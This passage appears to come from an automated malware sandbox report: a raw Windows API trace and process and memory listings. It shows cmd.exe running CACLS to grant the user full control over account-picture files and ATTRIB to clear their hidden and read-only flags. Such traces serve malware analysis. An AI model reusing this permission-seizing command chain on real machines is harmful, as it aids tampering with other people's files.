lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f5b4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f600 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x28f600*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda4, dwThreadId=0xcc8)) returned 1 [0182.373] CloseHandle (hObject=0x4c) returned 1 [0182.374] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.374] GetEnvironmentStringsW () returned 0x440308* [0182.374] FreeEnvironmentStringsW (penv=0x440308) returned 1 [0182.374] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0182.420] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28f4f4 | out: lpExitCode=0x28f4f4*=0x0) returned 1 [0182.420] CloseHandle (hObject=0x50) returned 1 [0182.420] _vsnwprintf (in: _Buffer=0x28f63c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f500 | out: _Buffer="00000000") returned 8 [0182.420] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.420] GetEnvironmentStringsW () returned 0x442410* [0182.420] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.420] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.420] GetEnvironmentStringsW () returned 0x442410* [0182.420] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.420] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f558 | out: lpAttributeList=0x28f558) [0182.420] GetConsoleTitleW (in: lpConsoleTitle=0x28f93c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.421] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.421] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.421] GetLastError () returned 0x2 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.422] GetLastError () returned 0x2 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x43e4d8 [0182.422] FindClose (in: hFindFile=0x43e4d8 | out: hFindFile=0x43e4d8) returned 1 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0xffffffff [0182.422] GetLastError () returned 0x2 [0182.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f1d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1d8) returned 0x43e4d8 [0182.422] FindClose (in: hFindFile=0x43e4d8 | out: hFindFile=0x43e4d8) returned 1 [0182.423] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.423] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.423] GetConsoleTitleW (in: lpConsoleTitle=0x28f6d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.423] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f558, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f620 | out: lpAttributeList=0x28f558, lpSize=0x28f620) returned 1 [0182.423] UpdateProcThreadAttribute (in: lpAttributeList=0x28f558, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f618, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f558, lpPreviousValue=0x0) returned 1 [0182.423] GetStartupInfoW (in: lpStartupInfo=0x28f514 | out: lpStartupInfo=0x28f514*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.423] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.423] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f5b4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f600 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessInformation=0x28f600*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd20, dwThreadId=0xc78)) returned 1 [0182.425] CloseHandle (hObject=0x50) returned 1 [0182.425] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.425] GetEnvironmentStringsW () returned 0x442410* [0182.425] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.425] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0182.486] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x28f4f4 | out: lpExitCode=0x28f4f4*=0x0) returned 1 [0182.486] CloseHandle (hObject=0x4c) returned 1 [0182.486] _vsnwprintf (in: _Buffer=0x28f63c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f500 | out: _Buffer="00000000") returned 8 [0182.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.486] GetEnvironmentStringsW () returned 0x442410* [0182.486] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.486] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.486] GetEnvironmentStringsW () returned 0x442410* [0182.486] FreeEnvironmentStringsW (penv=0x442410) returned 1 [0182.486] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f558 | out: lpAttributeList=0x28f558) [0182.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.487] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.487] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.487] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.487] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.487] SetConsoleInputExeNameW () returned 0x1 [0182.487] GetConsoleOutputCP () returned 0x1b5 [0182.487] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.487] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.487] exit (_Code=0) Process: id = "347" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "346" os_parent_pid = "0xcb0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25700 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25701 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25702 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25703 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 25704 start_va = 0x220000 end_va = 0x228fff entry_point = 0x220000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25705 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25706 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25707 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25708 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25709 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25710 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25711 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25712 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25713 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 25714 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 25715 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25716 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25717 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25718 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25719 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25720 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25721 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 499 os_tid = 0xcc8 Thread: id = 500 os_tid = 0xd24 Process: id = "348" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "346" os_parent_pid = "0xcb0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25722 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25723 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25724 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25725 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25726 start_va = 0x9f0000 end_va = 0x9f6fff entry_point = 0x9f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25727 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25728 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25729 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25730 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 25731 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25732 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25733 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25734 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25735 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 25736 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 25737 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25738 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25739 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25740 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25741 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25742 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25743 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25744 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25745 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25746 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25747 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25748 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25749 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25750 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25751 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 501 os_tid = 0xc78 Process: id = "349" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25753 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25754 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25755 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25756 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25757 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25760 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 25761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25764 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25765 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 25766 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 25767 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25769 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25770 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25771 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25772 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25773 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25774 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25776 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 25777 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25778 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25779 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25780 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25781 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25782 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25783 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 25784 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 25785 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 25786 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 502 os_tid = 0xa20 [0182.550] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe44 | out: lpSystemTimeAsFileTime=0x24fe44*(dwLowDateTime=0xa1b688a0, dwHighDateTime=0x1d440a9)) [0182.550] GetCurrentProcessId () returned 0xc54 [0182.550] GetCurrentThreadId () returned 0xa20 [0182.550] GetTickCount () returned 0x3450a [0182.550] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe3c | out: lpPerformanceCount=0x24fe3c*=23933937536) returned 1 [0182.551] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0182.551] __set_app_type (_Type=0x1) [0182.551] __p__fmode () returned 0x76b331f4 [0182.551] __p__commode () returned 0x76b331fc [0182.551] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0182.551] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0182.551] GetCurrentThreadId () returned 